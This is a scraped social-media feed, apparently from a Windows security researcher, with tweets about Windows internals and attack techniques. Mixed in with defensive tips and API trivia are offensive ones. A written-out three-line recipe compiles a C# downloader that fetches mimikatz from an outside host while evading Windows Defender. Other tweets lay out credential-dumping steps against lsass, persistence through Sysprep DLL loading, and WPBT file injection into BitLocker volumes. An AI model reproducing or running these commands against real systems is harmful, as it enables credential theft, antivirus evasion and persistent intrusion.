My own research, unless stated otherwise. Not necessarily "safe when taken as directed". GIT d- s+: a+ C++++ !U !L !M w++++$ b++++ G-

Joined April 2012
Live kernel dump with PowerShell one-liner 😎💪 $ss = Get-CimInstance -ClassName MSFT_StorageSubSystem -Namespace Root\Microsoft\Windows\Storage Invoke-CimMethod -InputObject $ss -MethodName "GetDiagnosticInfo" -Arguments @{DestinationPath="C:\dmp"; IncludeLiveDump=$true}
4
151
5
391
Need to download mimikatz (or some other nasty stuff) without alerting Windows Defender Antivirus? Paste these 3 lines into the command line 👇👇👇 1/2
30
510
18
1,622
Echo class Program {static void Main() {System.IO.File.WriteAllBytes("mimi.exe", new System.Net.WebClient().DownloadData("stderr.pl/mimi/mimikatz.exe"));}}>setupcl.cs %windir%\Microsoft.NET\Framework64\v4.0.30319\csc setupcl.cs setupcl.exe
5
24
0
132
OK. Found another one in the sacsvr.dll. And the flow is: 1. dism /online /add-capability /capabilityName:Windows.Desktop.EMS-SAC.Tool…~~~~0.0.1.0 2. bcdedit /ems {current} on 3. connect COM1 to COM2 4. launch putty 5. use 'procdump' command after you identify the PID with 't'
Thought experiment Find signed .exe that uses MiniDumpWriteDump to dump its procdump during its own crash instrument/NTFS transaction/patch it to swap PID in OpenProcess to lsass', and trigger exception lsass dump? caveat, it may use 'current process handle' w/o OpenProcess?
1
48
0
149
Not practical at all, but... Sysprep.exe loads custom DLLs from Windows\CurrentVersion\Setup\SysPrepExternal\<phasename> and calls the exported function specified after comma. Arbitrary paths accepted.
0
23
0
95
You do not need to be an admin to run Sysprep. It's enough if you have SeShutdownPrivilege & SeBackupPrivilege & SeRestorePrivilege & SeSystemEnvironmentPrivilege in your token. 🙃
2
4
0
19
The flow of signature checking "asks" for the DLL willing to do the actual job for a file. Just out of curiosity I have created a simple DLL reporting who is asking and about which file. The source file and the compiled DLL if you want to play as well: github.com/gtworek/PSBits/tr…
3
12
0
40
BTW it is not so bad idea, if you are looking for less known persistence locations. Highly privileged, automatic executions FTW.
0
0
0
1
Rozpoczął się drugi dzień zawodów #EuropeanCyberSecurityChallenge 2021 w Pradze. Aktualnie w czołówce 🇵🇱 🇩🇪 oraz 🇩🇰 z niewielką różnicą punktów. Rywalizacja potrwa do godziny 18:00, trzymajcie kciuki za naszą reprezentację🤞! 🇵🇱
0
3
1
12
If you are afraid of WPBT based attack, just create zero-length wpbt.bin with readonly attribute, and smss.exe will not overwrite it, and will never try to launch.
You can use WPBT feature to inject a file into #BitLocker protected volume and make it execute within smss.exe context 😳 - link.medium.com/tSZNMciUQZ
2
2
0
12
And of course the filename is wpbbin.exe, and not wpbt.bin
0
0
0
3
Did you spot the "-IncludeLiveDump" parameter of the "Get-StorageDiagnosticInfo" #PowerShell cmdlet? It does exactly what the name suggests: live dump of the entire OS memory 😎 Yet another way, built-in tools only, again 🤷🏻‍♂️
8
76
3
242
Give me any reason to use SFTP when I have BITS. - Built-in, - Uses https, - Works when device sleeps, - Failsafe (reconnects automatically), - Asynchronous (if you wish), - Easy to manage via cmdline/PowerShell/API, - Offers priorities and scheduling, - Supports peer caching.
15
24
0
124
When attackers use BitLocker to encrypt your drives (sic!), digging through the ntds.dit file and looking for recovery keys may be the best option. And it’s exactly why I created such script. ExtractFVEPasswordsFromNTDS.ps1 Enjoy :) github.com/gtworek/PSBits/bl…
5
313
6
761
It all started with STARTF_UNTRUSTEDSOURCE process flag. And then I have asked myself: how I can check such flags in the existing processes? As I cannot find such tool, I have written one. Enjoy! :) C source code, and the compiled exe, as usual: github.com/gtworek/PSBits/tr…
1
26
0
83
LocalAlloc() takes Flags, and then Size as parameters. LocalReAlloc() takes Size, and then Flags. What Could Possibly Go Wrong?
1
1
0
14
GIF